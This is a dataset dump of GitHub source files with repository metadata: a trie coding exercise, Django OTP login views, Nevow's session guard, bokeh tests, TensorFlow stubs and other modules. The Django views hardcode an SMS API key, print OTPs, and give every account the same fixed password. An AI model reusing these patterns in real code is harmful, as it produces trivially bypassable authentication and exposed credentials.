blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
32471ddbd0a025de389d955a990ab2f6f3e858c3 | 94f180b4b0b0a699d6948fd5e1216d16d6735edc | /source-code/Map Sum Pairs 677.py | 4e7990ac2f79efb70905565c8fdeeb02907fc31e | [
"MIT"
] | permissive | ttungl/Coding-Interview-Challenge | 7093b7f8da0c03abaf2f61340384cdc15c7a31e7 | d80c3e15468d50b42ee53fcc73e9326c6c816495 | refs/heads/master | 2021-09-15T05:25:27.192040 | 2018-05-26T19:02:33 | 2018-05-26T19:02:33 | 115,586,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,481 | py | # 677. Map Sum Pairs
# ttungl@gmail.com
# Implement a MapSum class with insert, and sum methods.
# For the method insert, you'll be given a pair of (string, integer). The string represents the key and the integer represents the value. If the key already existed, then the original key-value pair will be overridden to the new one.
# For the method sum, you'll be given a string representing the prefix, and you need to return the sum of all the pairs' value whose key starts with the prefix.
# Example 1:
# Input: insert("apple", 3), Output: Null
# Input: sum("ap"), Output: 3
# Input: insert("app", 2), Output: Null
# Input: sum("ap"), Output: 5
# sol 1
# runtime: 38ms
class TrieNode(object):
def __init__(self, v=0):
"""
Initialize your data structure here.
"""
self.children = collections.defaultdict()
self.count = v
class MapSum(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TrieNode()
self.keys = collections.defaultdict()
def insert(self, key, val):
"""
:type key: str
:type val: int
:rtype: void
"""
node = self.root
diff = val - self.keys.get(key, 0)
self.keys[key] = val
for c in key:
if c not in node.children:
node.children[c] = TrieNode()
node = node.children[c]
node.count += diff
def sum(self, prefix):
"""
:type prefix: str
:rtype: int
"""
node = self.root
for c in prefix:
if c not in node.children:
return 0
node = node.children[c]
return node.count
# sol 2:
# runtime: 31ms
class MapSum(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.x = {}
def insert(self, key, val):
"""
:type key: str
:type val: int
:rtype: void
"""
self.x[key] = val
def sum(self, prefix):
"""
:type prefix: str
:rtype: int
"""
a = 0
for i in self.x.keys():
if i[:len(prefix)] == prefix:
a+=self.x[i]
return a
# Your MapSum object will be instantiated and called as such:
# obj = MapSum()
# obj.insert(key,val)
# param_2 = obj.sum(prefix)
| [
"noreply@github.com"
] | ttungl.noreply@github.com |
1d110680a248ff7b57501497a49da59bfba00b86 | a9fd2e227f7f529fbec50caa82d5962019c5f3ee | /account/views.py | a0e85245023aad2768d6dcdd5e24d8ad8acb1832 | [] | no_license | jsparmani/TeekaSchedule | 1477f3b38aec484c77276fc0f731c85c12fa34d2 | 76c01dd742f692cfd50c299807413b99a20c5535 | refs/heads/master | 2020-07-15T06:36:11.500851 | 2019-09-01T05:46:57 | 2019-09-01T05:46:57 | 205,501,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,949 | py | from django.shortcuts import render, redirect
from . import forms
import random
from . import models
from django.contrib.auth import authenticate
from django.contrib.auth import login as auth_login
from django.contrib.auth.models import User
from datetime import datetime
from location import models as loc_models
import requests
# Create your views here.
api_key = '292a8d1f-295e-11e9-9ee8-0200cd936042'
def get_parent_username(request):
if request.method == 'POST':
form = forms.ParentUsernameForm(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
otp = random.randint(111111, 999999)
try:
otp_user = models.OTP.objects.create(
username=username,
otp=otp,
created_at=datetime.now()
)
except:
return redirect('fault', fault="Server Error!")
print(otp)
# link = f'https://2factor.in/API/R1/?module=TRANS_SMS&apikey={api_key}&to={username}&from=ECIWEB&templatename=OTP&var1=Sir&var2={otp}'
# requests.get(link)
return redirect('account:get_parent_otp', pk=otp_user.pk)
else:
return redirect('fault', fault="Server Error!")
else:
form = forms.ParentUsernameForm()
return render(request, 'account/get_parent_username.html', {'form': form})
def get_parent_otp(request, pk):
otp_user = models.OTP.objects.get(pk__exact=pk)
if request.method == 'POST':
form = forms.ParentOTPForm(request.POST)
if form.is_valid():
otp = form.cleaned_data['otp']
if otp == otp_user.otp:
user = authenticate(request, username=otp_user.username,
password='testpassword')
if user:
auth_login(request, user)
return redirect('home')
else:
user = User.objects.create_user(
username=otp_user.username,
password='testpassword'
)
user.save()
models.ParentUser.objects.create(
user=user
)
user = authenticate(request, username=otp_user.username,
password='testpassword')
auth_login(request, user)
return redirect('home')
else:
return redirect('fault', fault="Invalid Credentials!")
else:
return redirect('fault', fault="Server Error!")
else:
form = forms.ParentOTPForm()
return render(request, 'account/get_parent_otp.html', {'form': form})
def get_parent_details(request):
if request.method == 'POST':
form = forms.ParentDetailsForm(request.POST)
if form.is_valid():
address = form.cleaned_data['address']
f_name = form.cleaned_data['f_name']
m_name = form.cleaned_data['m_name']
f_dob = form.cleaned_data['f_dob']
m_dob = form.cleaned_data['m_dob']
print(request.user.username)
try:
user = models.ParentUser.objects.get(
user__username__exact=request.user.username)
except:
return redirect('fault', fault="Server Error")
user.f_name = f_name
user.m_name = m_name
user.f_dob = f_dob
user.m_dob = m_dob
user.address = loc_models.Locality.objects.get(name__exact=address)
user.save()
return redirect('home')
else:
return redirect('fault', fault="Server Error!")
else:
form = forms.ParentDetailsForm()
return render(request, 'account/get_parent_details.html', {'form': form})
| [
"jsparmani@gmail.com"
] | jsparmani@gmail.com |
3f4cb50a830c6cc835b54c6700548fc256c8fb0b | 5ef46abb67b07646537b4fc1d5880fdc91e412b2 | /Sea/adapter/couplings/Coupling2DCavities3D.py | 01b99fed556d8c6968ba029fb6095735b7343e64 | [] | no_license | python-acoustics/Sea | 3f13f8d0d39200a4b35f9edfe8e3a7b2783c6966 | e30b6dc59d8ab02cd41924f7b6c14d0d1e77e19e | refs/heads/master | 2016-09-05T16:59:01.602835 | 2013-04-16T15:29:54 | 2013-04-16T15:29:54 | 7,466,520 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,060 | py | import numpy as np
import Sea
from Coupling import Coupling
class Coupling2DCavities2D(Coupling):
"""
Coupling for cavity2D to cavity transmission.
"""
@property
def impedance_from(self):
"""
Choses the right impedance of subsystem_from.
Applies boundary conditions correction as well.
"""
return self.subsystem_from.impedance
@property
def impedance_to(self):
"""
Choses the right impedance of subsystem_from.
Applies boundary conditions correction as well.
"""
return self.subsystem_to.impedance
@property
def tau(self):
"""
Transmission coefficient.
"""
return np.zeros(self.frequency.amount)
@property
def clf(self):
"""
Coupling loss factor for transmission from a 2D cavity to a cavity.
.. math:: \\eta_{12} = \\frac{ \\tau_{12}}{4 \\pi}
See BAC, equation 3.14
"""
return self.tau / (4.0 * np.pi) | [
"fridh@fridh.nl"
] | fridh@fridh.nl |
829b5c5c784978dd392e43c8f6430520201503fe | 2a3743ced45bd79826dcdc55f304da049f627f1b | /venv/lib/python3.7/site-packages/bokeh/util/tests/test_dependencies.py | f27c2fd625febb1ffaad405c649ce2d9ae7294d0 | [
"MIT"
] | permissive | Dimasik007/Deribit_funding_rate_indicator | 12cc8cd7c0be564d6e34d9eae91940c62492ae2a | 3251602ae5249069489834f9afb57b11ff37750e | refs/heads/master | 2023-05-26T10:14:20.395939 | 2019-08-03T11:35:51 | 2019-08-03T11:35:51 | 198,705,946 | 5 | 3 | MIT | 2023-05-22T22:29:24 | 2019-07-24T20:32:19 | Python | UTF-8 | Python | false | false | 2,956 | py | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
# Module under test
import bokeh.util.dependencies as dep
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Test_detect_phantomjs(object):
def test_detect_phantomjs_success(self):
assert dep.detect_phantomjs() is not None
def test_detect_phantomjs_bad_path(self, monkeypatch):
monkeypatch.setenv("BOKEH_PHANTOMJS_PATH", "bad_path")
with pytest.raises(RuntimeError):
dep.detect_phantomjs()
def test_detect_phantomjs_bad_version(self):
with pytest.raises(RuntimeError) as e:
dep.detect_phantomjs('10.1')
assert str(e).endswith("PhantomJS version to old. Version>=10.1 required, installed: 2.1.1")
def test_detect_phantomjs_default_required_version(self):
assert dep.detect_phantomjs.__defaults__ == ('2.1',)
class Test_import_optional(object):
def test_success(self):
assert dep.import_optional('sys') is not None
def test_fail(self):
assert dep.import_optional('bleepbloop') is None
class Test_import_required(object):
def test_success(self):
assert dep.import_required('sys', 'yep') is not None
def test_fail(self):
with pytest.raises(RuntimeError) as excinfo:
dep.import_required('bleepbloop', 'nope')
assert 'nope' in str(excinfo.value)
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| [
"dmitriy00vn@gmail.com"
] | dmitriy00vn@gmail.com |
9097821fe104f0d2f6befb909014004251bafa8e | 1524720d6480ad0a51b6fd8ff709587455bf4c5d | /tums/trunk/release/lib/nevow/guard.py | 818f44ae12232b6d0892ae314cb15ec6bcb8c75c | [] | no_license | calston/tums | 2bd6d3cac5232d2ccb7e9becfc649e302a310eab | b93e3e957ff1da5b020075574942913c8822d12a | refs/heads/master | 2020-07-12T03:46:43.639800 | 2018-05-12T10:54:54 | 2018-05-12T10:54:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,278 | py | # -*- test-case-name: nevow.test.test_guard -*-
# Copyright (c) 2004-2008 Divmod.
# See LICENSE for details.
"""
Resource protection for Nevow. If you wish to use twisted.cred to protect your
Nevow application, you are probably most interested in
L{SessionWrapper}.
"""
__metaclass__ = type
import random
import time
import md5
import StringIO
from zope.interface import implements
# Twisted Imports
from twisted.python import log, components
from twisted.internet import defer
from twisted.cred.error import UnauthorizedLogin
from twisted.cred.credentials import UsernamePassword, Anonymous
try:
from twisted.web import http
except ImportError:
from twisted.protocols import http
# Nevow imports
from nevow import inevow, url, stan
def _sessionCookie():
return md5.new("%s_%s" % (str(random.random()) , str(time.time()))).hexdigest()
class GuardSession(components.Componentized):
"""A user's session with a system.
This utility class contains no functionality, but is used to
represent a session.
"""
implements(inevow.ISession, inevow.IGuardSession)
def __init__(self, guard, uid):
"""Initialize a session with a unique ID for that session.
"""
components.Componentized.__init__(self)
self.guard = guard
self.uid = uid
self.expireCallbacks = []
self.checkExpiredID = None
self.setLifetime(60)
self.portals = {}
self.touch()
# New Guard Interfaces
def getLoggedInRoot(self):
"""Get the most-recently-logged-in avatar.
"""
# XXX TODO: need to actually sort avatars by login order!
if len(self.portals) != 1:
raise RuntimeError("Ambiguous request for current avatar.")
return self.portals.values()[0][0]
def resourceForPortal(self, port):
return self.portals.get(port)
def setDefaultResource(self, rsrc, logout):
"""
Change the root-resource available to the user who has already
authenticated anonymously. This only works in applications that DO NOT
use the multiple-simultaneous-portals feature. If you do not know what
this means, you may safely ignore it.
"""
if len(self.portals) != 1:
raise RuntimeError("Ambiguous request for current avatar.")
self.setResourceForPortal(
rsrc,
self.portals.keys()[0],
logout)
def setResourceForPortal(self, rsrc, port, logout):
"""Change the root-resource available to a user authenticating against a given
portal.
If a user was already logged in to this session from that portal, first
log them out.
@param rsrc: an L{IResource} implementor.
@param port: a cred Portal instance.
@param logout: a 0-arg callable to be invoked upon logout.
"""
self.portalLogout(port)
self.portals[port] = rsrc, logout
return rsrc
def portalLogout(self, port):
"""
If we have previously acccepted a login for this portal, call its
logout method and de-associate that portal from this session, catching
any errors from the logout method.
Otherwise: do nothing.
@param port: a cred Portal.
"""
p = self.portals.get(port)
if p:
log.msg('Logout of portal %r' % port)
r, l = p
try:
l()
except:
log.err()
del self.portals[port]
# timeouts and expiration
def setLifetime(self, lifetime):
"""Set the approximate lifetime of this session, in seconds.
This is highly imprecise, but it allows you to set some general
parameters about when this session will expire. A callback will be
scheduled each 'lifetime' seconds, and if I have not been 'touch()'ed
in half a lifetime, I will be immediately expired.
"""
self.lifetime = lifetime
def notifyOnExpire(self, callback):
"""Call this callback when the session expires or logs out.
"""
self.expireCallbacks.append(callback)
def expire(self):
"""Expire/logout of the session.
"""
log.msg("expired session %s" % str(self.uid))
del self.guard.sessions[self.uid]
# Logout of all portals
for portal in self.portals.keys():
self.portalLogout(portal)
for c in self.expireCallbacks:
try:
c()
except:
log.err()
self.expireCallbacks = []
if self.checkExpiredID:
self.checkExpiredID.cancel()
self.checkExpiredID = None
def touch(self):
self.lastModified = time.time()
def checkExpired(self):
# Import reactor here to avoid installing default at startup
from twisted.internet import reactor
self.checkExpiredID = None
# If I haven't been touched in 15 minutes:
if time.time() - self.lastModified > self.lifetime / 2:
if self.guard.sessions.has_key(self.uid):
self.expire()
else:
log.msg("no session to expire: %s" % str(self.uid))
else:
log.msg("session given the will to live for %s more seconds" % self.lifetime)
self.checkExpiredID = reactor.callLater(self.lifetime,
self.checkExpired)
def __getstate__(self):
d = self.__dict__.copy()
if d.has_key('checkExpiredID'):
del d['checkExpiredID']
return d
def __setstate__(self, d):
self.__dict__.update(d)
self.touch()
self.checkExpired()
def urlToChild(ctx, *ar, **kw):
u = url.URL.fromContext(ctx)
for segment in ar:
u = u.child(stan.xml(segment))
if inevow.IRequest(ctx).method == 'POST':
u = u.clear()
for k,v in kw.items():
u = u.replace(k, v)
return u
SESSION_KEY = '__session_key__'
LOGIN_AVATAR = '__login__'
LOGOUT_AVATAR = '__logout__'
def nomind(*args): return None
class Forbidden(object):
implements(inevow.IResource)
def locateChild(self, ctx, segments):
return self
def renderHTTP(self, ctx):
request = inevow.IRequest(ctx)
request.setResponseCode(http.FORBIDDEN)
return ("<html><head><title>Forbidden</title></head>"
"<body><h1>Forbidden</h1>Request was forbidden.</body></html>")
class SessionWrapper:
"""
SessionWrapper
The following class attributes can be modified on an instance
of the class.
@ivar secureCookies: Whether to use secure (TLS only) cookies or not.
True (default): make cookies secure when session is initiated
in a secure (TLS) connection.
False: cookies do not get the secure attribute.
@ivar: persistentCookies: Whether to use persistent (saved to disk) cookies or not.
True: make cookies persistent, so they are valid for the
length of the sessionLifetime even if the browser window
is closed.
False (default): cookies do not get saved to disk, and thus last
only as long as the session does. If the browser is
closed before the session timeout, both the session
and the cookie go away.
"""
implements(inevow.IResource)
sessionLifetime = 3600
sessionFactory = GuardSession
# The interface to cred for when logging into the portal
credInterface = inevow.IResource
useCookies = True
secureCookies = True
persistentCookies = False
def __init__(self, portal, cookieKey=None, mindFactory=None, credInterface=None, useCookies=None):
self.portal = portal
if cookieKey is None:
cookieKey = "woven_session_" + _sessionCookie()
self.cookieKey = cookieKey
self.sessions = {}
if mindFactory is None:
mindFactory = nomind
self.mindFactory = mindFactory
if credInterface is not None:
self.credInterface = credInterface
if useCookies is not None:
self.useCookies = useCookies
# Backwards compatibility; remove asap
self.resource = self
def renderHTTP(self, ctx):
request = inevow.IRequest(ctx)
d = defer.maybeDeferred(self._delegate, ctx, [])
def _cb((resource, segments), ctx):
assert not segments
res = inevow.IResource(resource)
return res.renderHTTP(ctx)
d.addCallback(_cb, ctx)
return d
def locateChild(self, ctx, segments):
request = inevow.IRequest(ctx)
path = segments[0]
if self.useCookies:
cookie = request.getCookie(self.cookieKey)
else:
cookie = ''
if path.startswith(SESSION_KEY):
key = path[len(SESSION_KEY):]
if key not in self.sessions:
return urlToChild(ctx, *segments[1:], **{'__start_session__':1}), ()
self.sessions[key].setLifetime(self.sessionLifetime)
if cookie == key:
# /sessionized-url/${SESSION_KEY}aef9c34aecc3d9148/foo
# ^
# we are this getChild
# with a matching cookie
self.sessions[key].sessionJustStarted = True
return urlToChild(ctx, *segments[1:]), ()
else:
# We attempted to negotiate the session but failed (the user
# probably has cookies disabled): now we're going to return the
# resource we contain. In general the getChild shouldn't stop
# there.
# /sessionized-url/${SESSION_KEY}aef9c34aecc3d9148/foo
# ^ we are this getChild
# without a cookie (or with a mismatched cookie)
return self.checkLogin(ctx, self.sessions[key],
segments[1:],
sessionURL=segments[0])
else:
# /sessionized-url/foo
# ^ we are this getChild
# with or without a session
return self._delegate(ctx, segments)
def _delegate(self, ctx, segments):
"""Identify the session by looking at cookies and HTTP auth headers, use that
session key to identify the wrapped resource, then return a deferred
which fires a 2-tuple of (resource, segments) to the top-level
redirection code code which will delegate IResource's renderHTTP or
locateChild methods to it
"""
request = inevow.IRequest(ctx)
cookie = request.getCookie(self.cookieKey)
# support HTTP auth, no redirections
userpass = request.getUser(), request.getPassword()
httpAuthSessionKey = 'HTTP AUTH: %s:%s' % userpass
for sessionKey in cookie, httpAuthSessionKey:
if sessionKey in self.sessions:
session = self.sessions[sessionKey]
return self.checkLogin(ctx, session, segments)
# without a session
if userpass != ('',''):
# the user is trying to log in with HTTP auth, but they don't have
# a session. So, make them one.
sz = self.sessions[httpAuthSessionKey] = self.sessionFactory(self, httpAuthSessionKey)
# kick off the expiry timer.
sz.checkExpired()
return self.checkLogin(ctx, sz, segments, None, UsernamePassword(*userpass))
# no, really, without a session
## Redirect to the URL with the session key in it, plus the segments of the url
rd = self.createSession(ctx, segments)
return rd, ()
def createSession(self, ctx, segments):
"""
Create a new session for this request, and redirect back to the path
given by segments.
"""
request = inevow.IRequest(ctx)
newCookie = _sessionCookie()
if self.useCookies:
if self.secureCookies and request.isSecure():
secure = True
else:
secure = False
if self.persistentCookies and self.sessionLifetime:
expires = http.datetimeToString(time.time() + self.sessionLifetime)
else:
expires = None
request.addCookie(self.cookieKey, newCookie,
path="/%s" % '/'.join(request.prepath),
secure=secure, expires=expires,
domain=self.cookieDomainForRequest(request))
sz = self.sessions[newCookie] = self.sessionFactory(self, newCookie)
sz.args = request.args
sz.fields = request.fields
sz.method = request.method
sz.received_headers = request.received_headers
sz.checkExpired()
return urlToChild(ctx, SESSION_KEY+newCookie, *segments)
def checkLogin(self, ctx, session, segments, sessionURL=None, httpAuthCredentials=None):
"""
Associate the given request with the given session and:
- log the user in to our portal, if they are accessing a login URL
- log the user out from our portal (calling their logout callback),
if they are logged in and accessing a logout URL
- Move the request parameters saved on the session, if there are
any, onto the request if a session just started or a login
just succeeded.
@return:
- if the user is already logged in: a 2-tuple of requestObject,
C{segments} (i.e. the segments parameter)
- if the user is not logged in and not logging in, call login() to
initialize an anonymous session, and return a 2-tuple of
(rootResource, segments-parameter) from that anonymous session.
This counts as logging in for the purpose of future calls to
checkLogin.
- if the user is accessing a login URL: a 2-tuple of the logged in
resource object root and the remainder of the segments (i.e. the
URL minus __login__) to be passed to that resource.
"""
request = inevow.IRequest(ctx)
session.touch()
request.session = session
root = url.URL.fromContext(request)
if sessionURL is not None:
root = root.child(sessionURL)
request.rememberRootURL(str(root))
spoof = False
if getattr(session, 'sessionJustStarted', False):
del session.sessionJustStarted
spoof = True
if getattr(session, 'justLoggedIn', False):
del session.justLoggedIn
spoof = True
if spoof and hasattr(session, 'args'):
request.args = session.args
request.fields = session.fields
request.content = StringIO.StringIO()
request.content.close()
request.method = session.method
request.received_headers = session.received_headers
del session.args, session.fields, session.method, session.received_headers
if segments and segments[0] in (LOGIN_AVATAR, LOGOUT_AVATAR):
authCommand = segments[0]
else:
authCommand = None
if httpAuthCredentials:
# This is the FIRST TIME we have hit an HTTP auth session with our
# credentials. We are going to perform login.
assert not authCommand, (
"HTTP auth support isn't that robust. "
"Come up with something to do that makes sense here.")
return self.login(request, session, httpAuthCredentials, segments).addErrback(
self.authRequiredError, session
)
if authCommand == LOGIN_AVATAR:
subSegments = segments[1:]
def unmangleURL((res,segs)):
# Tell the session that we just logged in so that it will
# remember form values for us.
session.justLoggedIn = True
# Then, generate a redirect back to where we're supposed to be
# by looking at the root of the site and calculating the path
# down from there using the segments we were passed.
u = url.URL.fromString(request.getRootURL())
for seg in subSegments:
u = u.child(seg)
return u, ()
return self.login(request, session, self.getCredentials(request), subSegments).addCallback(
unmangleURL).addErrback(
self.incorrectLoginError, ctx, subSegments, "Incorrect login."
)
elif authCommand == LOGOUT_AVATAR:
self.explicitLogout(session)
return urlToChild(ctx, *segments[1:]), ()
else:
r = session.resourceForPortal(self.portal)
if r:
## Delegate our getChild to the resource our portal says is the right one.
return r[0], segments
else:
# XXX I don't think that the errback here will work at all,
# because the redirect loop would be infinite. Perhaps this
# should be closer to the HTTP auth path?
return self.login(request, session, Anonymous(), segments).addErrback(
self.incorrectLoginError, ctx, segments, 'Anonymous access not allowed.')
def explicitLogout(self, session):
"""Hook to be overridden if you care about user-requested logout.
Note: there is no return value from this method; it is purely a way to
provide customized behavior that distinguishes between session-expiry
logout, which is what 99% of code cares about, and explicit user
logout, which you may need to be notified of if (for example) your
application sets other HTTP cookies which refer to server-side state,
and you want to expire that state in a manual logout but not with an
automated logout. (c.f. Quotient's persistent sessions.)
If you want the user to see a customized logout page, just generate a
logout link that looks like
http://your-site.example.com/__logout__/my/custom/logout/stuff
and the user will see
http://your-site.example.com/my/custom/logout/stuff
as their first URL after becoming anonymous again.
"""
session.portalLogout(self.portal)
def getCredentials(self, request):
username = request.args.get('username', [''])[0]
password = request.args.get('password', [''])[0]
return UsernamePassword(username, password)
def login(self, request, session, credentials, segments):
"""
- Calls login() on our portal.
- creates a mind from my mindFactory, with the request and credentials
- Associates the mind with the given session.
- Associates the resource returned from my portal's login() with my
portal in the given session.
@return: a Deferred which fires a 2-tuple of the resource returned from
my portal's login() and the passed list of segments upon successful
login.
"""
mind = self.mindFactory(request, credentials)
session.mind = mind
return self.portal.login(credentials, mind, self.credInterface).addCallback(
self._cbLoginSuccess, session, segments
)
def _cbLoginSuccess(self, (iface, res, logout), session, segments):
session.setResourceForPortal(res, self.portal, logout)
return res, segments
def incorrectLoginError(self, error, ctx, segments, loginFailure):
""" Used as an errback upon failed login, returns a 2-tuple of a failure URL
with the query argument 'login-failure' set to the parameter
loginFailure, and an empty list of segments, to redirect to that URL.
The basis for this error URL, i.e. the part before the query string, is
taken either from the 'referer' header from the given request if one
exists, or a computed URL that points at the same page that the user is
currently looking at to attempt login. Any existing query string will
be stripped.
"""
request = inevow.IRequest(ctx)
error.trap(UnauthorizedLogin)
referer = request.getHeader("referer")
if referer is not None:
u = url.URL.fromString(referer)
else:
u = urlToChild(ctx, *segments)
u = u.clear()
u = u.add('login-failure', loginFailure)
return u, ()
def authRequiredError(self, error, session):
session.expire()
error.trap(UnauthorizedLogin)
return Forbidden(), ()
def cookieDomainForRequest(self, request):
"""
Specify the domain restriction on the session cookie.
@param request: The request object in response to which a cookie is
being set.
@return: C{None} or a C{str} giving the domain restriction to set on
the cookie.
"""
return None
| [
"junwin@gmail.com"
] | junwin@gmail.com |
5f93747a95298ff1f96092486f57e56a702b47cf | 9f1039075cc611198a988034429afed6ec6d7408 | /tensorflow-stubs/python/keras/engine/training.pyi | 87a6a2450c166433875a253c15926a2225a32a76 | [] | no_license | matangover/tensorflow-stubs | 9422fbb1cb3a3638958d621461291c315f9c6ec2 | 664bd995ef24f05ba2b3867d979d23ee845cb652 | refs/heads/master | 2020-05-23T12:03:40.996675 | 2019-05-15T06:21:43 | 2019-05-15T06:21:43 | 186,748,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,674 | pyi | # Stubs for tensorflow.python.keras.engine.training (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from tensorflow.python.data.ops import dataset_ops as dataset_ops, iterator_ops as iterator_ops
from tensorflow.python.data.ops.dataset_ops import Dataset as Dataset
from tensorflow.python.eager import context as context
from tensorflow.python.framework import errors as errors, ops as ops, tensor_util as tensor_util
from tensorflow.python.keras import losses as losses, optimizers as optimizers
from tensorflow.python.keras.engine import base_layer as base_layer, distributed_training_utils as distributed_training_utils, training_arrays as training_arrays, training_distributed as training_distributed, training_eager as training_eager, training_generator as training_generator, training_utils as training_utils
from tensorflow.python.keras.engine.network import Network as Network
from tensorflow.python.keras.utils import data_utils as data_utils
from tensorflow.python.keras.utils.generic_utils import slice_arrays as slice_arrays
from tensorflow.python.ops import math_ops as math_ops, weights_broadcast_ops as weights_broadcast_ops
from tensorflow.python.util import nest as nest
from tensorflow.python.util.tf_export import tf_export as tf_export
from typing import Any as Any, Optional as Optional
class Model(Network):
def __init__(self, *args: Any, **kwargs: Any) -> None: ...
optimizer: Any = ...
loss: Any = ...
metrics: Any = ...
loss_weights: Any = ...
sample_weight_mode: Any = ...
weighted_metrics: Any = ...
target_tensors: Any = ...
loss_functions: Any = ...
loss_weights_list: Any = ...
total_loss: Any = ...
targets: Any = ...
train_function: Any = ...
test_function: Any = ...
predict_function: Any = ...
def compile(self, optimizer: Any, loss: Optional[Any] = ..., metrics: Optional[Any] = ..., loss_weights: Optional[Any] = ..., sample_weight_mode: Optional[Any] = ..., weighted_metrics: Optional[Any] = ..., target_tensors: Optional[Any] = ..., distribute: Optional[Any] = ..., **kwargs: Any) -> None: ...
def fit(self, x: Optional[Any] = ..., y: Optional[Any] = ..., batch_size: Optional[Any] = ..., epochs: int = ..., verbose: int = ..., callbacks: Optional[Any] = ..., validation_split: float = ..., validation_data: Optional[Any] = ..., shuffle: bool = ..., class_weight: Optional[Any] = ..., sample_weight: Optional[Any] = ..., initial_epoch: int = ..., steps_per_epoch: Optional[Any] = ..., validation_steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ..., **kwargs: Any): ...
def evaluate(self, x: Optional[Any] = ..., y: Optional[Any] = ..., batch_size: Optional[Any] = ..., verbose: int = ..., sample_weight: Optional[Any] = ..., steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ...): ...
def predict(self, x: Any, batch_size: Optional[Any] = ..., verbose: int = ..., steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ...): ...
def train_on_batch(self, x: Any, y: Optional[Any] = ..., sample_weight: Optional[Any] = ..., class_weight: Optional[Any] = ...): ...
def test_on_batch(self, x: Any, y: Optional[Any] = ..., sample_weight: Optional[Any] = ...): ...
def predict_on_batch(self, x: Any): ...
def fit_generator(self, generator: Any, steps_per_epoch: Optional[Any] = ..., epochs: int = ..., verbose: int = ..., callbacks: Optional[Any] = ..., validation_data: Optional[Any] = ..., validation_steps: Optional[Any] = ..., class_weight: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ..., shuffle: bool = ..., initial_epoch: int = ...): ...
def evaluate_generator(self, generator: Any, steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ..., verbose: int = ...): ...
def predict_generator(self, generator: Any, steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ..., verbose: int = ...): ...
class DistributedCallbackModel(Model):
def __init__(self, model: Any) -> None: ...
def set_original_model(self, orig_model: Any) -> None: ...
def save_weights(self, filepath: Any, overwrite: bool = ..., save_format: Optional[Any] = ...) -> None: ...
def save(self, filepath: Any, overwrite: bool = ..., include_optimizer: bool = ...) -> None: ...
def load_weights(self, filepath: Any, by_name: bool = ...) -> None: ...
def __getattr__(self, item: Any) -> None: ...
| [
"matangover@gmail.com"
] | matangover@gmail.com |
1a6d659303222b5d59f9083a0bc38b15e669503e | 1025bc2aa5aaa40970ad1a51d8d0b1202a1ea11e | /StatTools/python/RooFunctorFromWS.py | 61a6d6dc6bf708de8fef6714998d0555c78dac99 | [] | no_license | uwcms/FinalStateAnalysis | f2be318546728621676a4b90ed2678b2560c94e6 | bcb164a8e27d459a9ac438780f6c8730d3e856bf | refs/heads/miniAOD_9_4_0 | 2022-11-09T01:28:52.199025 | 2019-03-15T19:25:10 | 2019-03-15T19:25:10 | 5,201,989 | 5 | 32 | null | 2020-11-19T17:02:32 | 2012-07-27T07:51:18 | Python | UTF-8 | Python | false | false | 7,941 | py | '''
RooFunctorFromWS
Builds a functor from a function in a RooWorkspace.
This could be improved with cython.
Author: Evan K. Friis, UW Madison
>>> from FinalStateAnalysis.Utilities.rootbindings import ROOT
>>> file = ROOT.TFile('../test/test_RooFunctorFromWS.root')
>>> ws = file.Get('fit_efficiency')
>>> functor = RooFunctorFromWS(ws, 'efficiency')
>>> '%0.4f' % functor(60)
'0.0244'
>>> '%0.4f' % functor(140)
'0.0138'
'''
from FinalStateAnalysis.Utilities.rootbindings import ROOT
import array
from pdb import set_trace
from FinalStateAnalysis.PlotTools.decorators import memo_last
